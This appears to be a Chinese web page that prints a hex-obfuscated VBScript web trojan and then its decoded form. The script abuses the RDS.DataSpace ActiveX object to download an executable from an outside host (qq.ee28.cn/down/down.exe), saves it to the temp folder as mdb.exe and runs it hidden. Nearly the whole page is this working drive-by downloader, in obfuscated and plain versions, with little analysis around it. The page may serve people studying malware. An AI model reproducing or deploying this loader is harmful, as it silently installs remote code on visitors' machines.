<script language="vbscript">
s="2020206f6e206572726f7220726573756d65206e6578740d0a737
3733d226d64622e657865220d0a61613d226f62220d0a6161613d22
6a65220d0a616161613d226374220d0a61616161613d22636c61220
d0a6161616161613d2273736964220d0a616161616161613d22636c
73220d0a61616161616161613d2269643a42443936220d0a6161616
161616161613d22433535362d3635220d0a61616161616161616161
3d2241332d313144220d0a61616161616161616161613d22302d393
8220d0a6161616161616161616161613d2233412d30304330344622
0d0a616161616161616161616161613d22433239453336220d0a6d6
d3d224d6963220d0a6e6e3d22726f73220d0a6d6d6e6e3d226f6674
2e58220d0a6e6e6d6d3d224d4c48220d0a6d6e6d6e3d22545450220
d0a6e6d3d6d6e0d0a62623d224164220d0a6262623d226f64220d0a
626262623d22622e5374220d0a62626262623d227265616d220d0a6
7673d2267220d0a65653d2265220d0a74743d2274220d0a63633d22
536372220d0a6363633d22697074220d0a636363633d22696e672e4
6220d0a6363313d22696c6553220d0a636363313d22797374220d0a
63636363313d22656d4f220d0a6363323d22626a220d0a636363323
d22656374220d0a68683d22536865220d0a6868683d226c6c2e4170
220d0a686868683d22706c69220d0a68686868683d2263617469220
d0a6868686868683d226f6e220d0a6f6f3d226f220d0a6f6f6f3d227
065220d0a6f6f6f6f3d226e220d0a536574207878787878787878203
d20646f63756d656e742e637265617465456c656d656e7428616126
6161612661616161290d0a78787878787878782e7365744174747269
62757465206161616161266161616161612c20616161616161612661
61616161616161266161616161616161612661616161616161616161
26616161616161616161616126616161616161616161616161266161
61616161616161616161610d0a53657420787878787878203d207878
7878787878782e4372656174654f626a656374286d6d266e6e266d6
d6e6e266e6e6d6d266d6e6d6e2c2222290d0a736574207878787820
3d2078787878787878782e6372656174656f626a6563742862622662
626226626262622662626262622c2222290d0a787878782e74797065
203d20310d0a7878787878782e4f70656e2067672665652674742c20
22687474703a2f2f71712e656532382e636e2f646f776e2f646f776e2
e657865222c2046616c73650d0a7878787878782e53656e640d0a78
7878787878783d7373730d0a20202020736574207878787878203d2
078787878787878782e6372656174656f626a6563742863632663636
32663636363266363312663636331266363636331266363322663636
3322c2222290d0a2020202073657420746d70203d2078787878782e
4765745370656369616c466f6c646572283229200d0a202020207878
78787878783d2078787878782e4275696c645061746828746d702c7
8787878787878290d0a20202020787878782e6f70656e0d0a2020202
0787878782e7772697465207878787878782e726573706f6e7365426
f64790d0a20202020787878782e73617665746f66696c65207878787
87878782c320d0a20202020787878782e636c6f73650d0a20202020
73657420717171203d2078787878787878782e6372656174656f626a
65637428686826686868266868686826686868686826686868686868
2c2222290d0a202020207171712e5368656c6c45786563757465207
87878787878782c22222c22222c6f6f266f6f6f266f6f6f6f2c30":d
="execute """"":c="&chr(&h":n=")":do while len(s)>1:if isnumer
ic(left(s,1)) then d=d&c&left(s,2)&n:s=mid(s,3) else d=d&c&lef
t(s,4)&n:s=mid(s,5)
loop:execute d
</script>
解密后:
on error resume next
sss="mdb.exe"
aa="ob"
aaa="je"
aaaa="ct"
aaaaa="cla"
aaaaaa="ssid"
aaaaaaa="cls"
aaaaaaaa="id:bd96"
aaaaaaaaa="c556-65"
aaaaaaaaaa="a3-11d"
aaaaaaaaaaa="0-98"
aaaaaaaaaaaa="3a-00c04f"
aaaaaaaaaaaaa="c29e36"
mm="mic"
nn="ros"
mmnn="oft.x"
nnmm="mlh"
mnmn="ttp"
nm=mn
bb="ad"
bbb="od"
bbbb="b.st"
bbbbb="ream"
gg="g"
ee="e"
tt="t"
cc="scr"
ccc="ipt"
cccc="ing.f"
cc1="iles"
ccc1="yst"
cccc1="emo"
cc2="bj"
ccc2="ect"
hh="she"
hhh="ll.ap"
hhhh="pli"
hhhhh="cati"
hhhhhh="on"
oo="o"
ooo="pe"
oooo="n"
set xxxxxxxx = document.createelement(aa&aaa&aaaa)
xxxxxxxx.setattribute aaaaa&aaaaaa, aaaaaaa&aaaaaaaa&aaaaaaaaa&aaaaaaaaaa&aaaaaaaaaaa&aaaaaaaaaaaa&aaaaaaaaaaaaa
set xxxxxx = xxxxxxxx.createobject(mm&nn&mmnn&nnmm&mnmn,"")
set xxxx = xxxxxxxx.createobject(bb&bbb&bbbb&bbbbb,"")
xxxx.type = 1
xxxxxx.open gg&ee&tt, "http://qq.ee28.cn/down/down.exe", false
xxxxxx.send
xxxxxxx=sss
set xxxxx = xxxxxxxx.createobject(cc&ccc&cccc&cc1&ccc1&cccc1&cc2&ccc2,"")
set tmp = xxxxx.getspecialfolder(2)
xxxxxxx= xxxxx.buildpath(tmp,xxxxxxx)
xxxx.open
xxxx.write xxxxxx.responsebody
xxxx.savetofile xxxxxxx,2
xxxx.close
set qqq = xxxxxxxx.createobject(hh&hhh&hhhh&hhhhh&hhhhhh,"")
qqq.shellexecute xxxxxxx,"","",oo&ooo&oooo,0
如对本文有疑问,
点击进行留言回复!!
我要评论
网友评论